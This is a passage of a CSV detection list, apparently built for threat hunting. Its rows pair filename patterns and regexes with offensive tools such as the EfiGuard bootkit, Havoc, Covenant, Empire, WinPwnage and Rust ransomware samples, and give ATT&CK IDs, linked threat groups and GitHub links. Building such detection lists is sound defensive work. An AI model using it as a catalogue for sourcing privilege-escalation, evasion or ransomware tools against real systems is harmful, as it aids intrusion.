"*\EfiGuard.sln*",".{0,1000}\\EfiGuard\.sln.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","0","N/A","N/A","10","10","1977","354","2025-02-24T11:57:36Z","2019-03-25T19:47:39Z","15228" "*\EfiGuardDxe.c*",".{0,1000}\\EfiGuardDxe\.c.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard 
and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","0","N/A","N/A","10","10","1977","354","2025-02-24T11:57:36Z","2019-03-25T19:47:39Z","15229" "*\EfiGuardDxe.h*",".{0,1000}\\EfiGuardDxe\.h.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","0","N/A","N/A","10","10","1977","354","2025-02-24T11:57:36Z","2019-03-25T19:47:39Z","15230" "*\EfiGuardDxe\X64\*",".{0,1000}\\EfiGuardDxe\\X64\\.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","0","N/A","N/A","10","10","1977","354","2025-02-24T11:57:36Z","2019-03-25T19:47:39Z","15231" "*\EfsPotato.exe*",".{0,1000}\\EfsPotato\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","15232" "*\Egress-Assess*",".{0,1000}\\Egress\-Assess.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","15233" "*\Ekko.exe*",".{0,1000}\\Ekko\.exe.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","15247" "*\elevate_handle_inheritance.py*",".{0,1000}\\elevate_handle_inheritance\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","15248" "*\elevate_mofcomp.py*",".{0,1000}\\elevate_mofcomp\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","15249" "*\elevate_named_pipe_impersonation.py*",".{0,1000}\\elevate_named_pipe_impersonation\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","15250" "*\elevate_schtasks.py*",".{0,1000}\\elevate_schtasks\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","15251" "*\elevate_token_impersonation.py*",".{0,1000}\\elevate_token_impersonation\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","15252" "*\elevate_wmic.py*",".{0,1000}\\elevate_wmic\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","15253" "*\elevateit.bat*",".{0,1000}\\elevateit\.bat.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","N/A","4","368","45","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z","15254" "*\elevator.exe -*",".{0,1000}\\elevator\.exe\s\-.{0,1000}","offensive_tool_keyword","Elevator","UAC bypass by abusing RPC and debug objects.","T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Kudaes/Elevator","1","0","N/A","N/A","10","7","614","69","2023-10-19T08:51:09Z","2022-08-25T21:39:28Z","15255" "*\Elevator\target\release*",".{0,1000}\\Elevator\\target\\release.{0,1000}","offensive_tool_keyword","Elevator","UAC bypass by abusing RPC and debug objects.","T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Kudaes/Elevator","1","0","N/A","N/A","10","7","614","69","2023-10-19T08:51:09Z","2022-08-25T21:39:28Z","15256" "*\ELF\portscan*",".{0,1000}\\ELF\\portscan.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - 
T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","0","N/A","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","15257" "*\ELF\serverscan*",".{0,1000}\\ELF\\serverscan.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - 
BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","0","N/A","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","15258" "*\Elite.csproj*",".{0,1000}\\Elite\.csproj.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","0","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","15259" "*\Elite.sln*",".{0,1000}\\Elite\.sln.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","0","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","15260" "*\ELMALISEKER Backd00r.asp*",".{0,1000}\\ELMALISEKER\sBackd00r\.asp.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","15261" "*\elusiveMice.cna*",".{0,1000}\\elusiveMice\.cna.{0,1000}","offensive_tool_keyword","ElusiveMice","Cobalt Strike User-Defined Reflective Loader with AV/EDR Evasion in mind","T1620 - T1055.012 - T1202","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/mgeeky/ElusiveMice","1","1","N/A","N/A","10","5","449","78","2023-07-12T17:54:07Z","2021-08-27T19:22:20Z","15262" "*\emailall.py*",".{0,1000}\\emailall\.py.{0,1000}","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","0","N/A","N/A","6","8","715","117","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z","15263" "*\empire_exec.py*",".{0,1000}\\empire_exec\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","15266" "*\empire_stager.cmd*",".{0,1000}\\empire_stager\.cmd.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. 
Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","15267" "*\EmpireCompiler.dll*",".{0,1000}\\EmpireCompiler\.dll.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","15268" "*\enable_all_tokens.exe*",".{0,1000}\\enable_all_tokens\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced 
techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","15270" "*\EnableAllMacros_AMSI.py*",".{0,1000}\\EnableAllMacros_AMSI\.py.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","15271" "*\EnableAllMacros_AMSI.vba*",".{0,1000}\\EnableAllMacros_AMSI\.vba.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","15272" "*\EnableAllTokenPrivs.cs*",".{0,1000}\\EnableAllTokenPrivs\.cs.{0,1000}","offensive_tool_keyword","EnableAllTokenPrivs","Enable or Disable TokenPrivilege(s)","T1134 - T1055","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/xvt-void/EnableAllTokenPrivs","1","0","N/A","N/A","7","1","13","5","2024-05-17T12:43:43Z","2024-02-17T15:39:25Z","15273" "*\EnableAllTokenPrivs.exe*",".{0,1000}\\EnableAllTokenPrivs\.exe.{0,1000}","offensive_tool_keyword","EnableAllTokenPrivs","Enable or Disable TokenPrivilege(s)","T1134 - T1055","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/xvt-void/EnableAllTokenPrivs","1","0","N/A","N/A","7","1","13","5","2024-05-17T12:43:43Z","2024-02-17T15:39:25Z","15274" "*\EnableAllTokenPrivs.ps1*",".{0,1000}\\EnableAllTokenPrivs\.ps1.{0,1000}","offensive_tool_keyword","EnableAllTokenPrivs","Enable or Disable TokenPrivilege(s)","T1134 - T1055","TA0004 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/xvt-void/EnableAllTokenPrivs","1","0","N/A","N/A","7","1","13","5","2024-05-17T12:43:43Z","2024-02-17T15:39:25Z","15275" "*\enable-defender.exe*",".{0,1000}\\enable\-defender\.exe.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","N/A","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","15276" "*\Enable-DuplicateToken.ps1*",".{0,1000}\\Enable\-DuplicateToken\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","15277" "*\enc_shellcode.bin*",".{0,1000}\\enc_shellcode\.bin.{0,1000}","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","0","N/A","N/A","10","2","170","24","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z","15278" "*\enc_shellcode.h*",".{0,1000}\\enc_shellcode\.h.{0,1000}","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - 
T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","0","N/A","N/A","10","2","170","24","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z","15279" "*\enc-rot13.ps1*",".{0,1000}\\enc\-rot13\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","15280" "*\Encryfer-X.exe*","NA","offensive_tool_keyword","Rust-Malware-Samples","open source ransomware Encryfer in rust","T1486 - T1489 - T1485","TA0040 - TA0043 - TA0042","N/A","N/A","Ransomware","https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/Malware-Samples","1","0","N/A","N/A","10","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","15281" "*\Encryfer-X\*",".{0,1000}\\Encryfer\-X\\.{0,1000}","offensive_tool_keyword","Rust-Malware-Samples","open source ransomware Encryfer in rust","T1486 - T1489 - T1485","TA0040 - TA0043 - TA0042","N/A","N/A","Ransomware","https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/Malware-Samples","1","0","N/A","N/A","10","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","15282" "*\Encrypor-X.exe*",".{0,1000}\\Encrypor\-X\.exe.{0,1000}","offensive_tool_keyword","Rust-Malware-Samples","open source ransomware Encryfer in rust","T1486 - T1489 - T1485","TA0040 - TA0043 - 
TA0042","N/A","N/A","Ransomware","https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/Malware-Samples","1","0","N/A","N/A","10","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","15283" "*\EncryptedZIP.exe*",".{0,1000}\\EncryptedZIP\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","15284" "*\encrypthub_steal.ps1*",".{0,1000}\\encrypthub_steal\.ps1.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","15285" "*\encryption_aes.exe*",".{0,1000}\\encryption_aes\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","15286" 
"*\encryption_rc4.exe*",".{0,1000}\\encryption_rc4\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","15287" "*\Encyfer-X-Decryptor*",".{0,1000}\\Encyfer\-X\-Decryptor.{0,1000}","offensive_tool_keyword","Rust-Malware-Samples","open source ransomware Encryfer in rust","T1486 - T1489 - T1485","TA0040 - TA0043 - TA0042","N/A","N/A","Ransomware","https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/Malware-Samples","1","0","N/A","N/A","10","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","15288" "*\endpoint_takeover.py*",".{0,1000}\\endpoint_takeover\.py.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","0","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","15289" "*\enterprise_admins.txt*",".{0,1000}\\enterprise_admins\.txt.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","0","N/A","N/A","5","4","389","106","2025-04-08T06:17:54Z","2018-04-20T11:29:06Z","15290" "*\enum_av.py*",".{0,1000}\\enum_av\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 
- T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","15291" "*\enum_dns.py*",".{0,1000}\\enum_dns\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","15292" "*\enum_installed_software.py*",".{0,1000}\\enum_installed_software\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","15293" "*\enum4linux.py*",".{0,1000}\\enum4linux\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","15294" "*\EnumBrowsers.ps1*",".{0,1000}\\EnumBrowsers\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - 
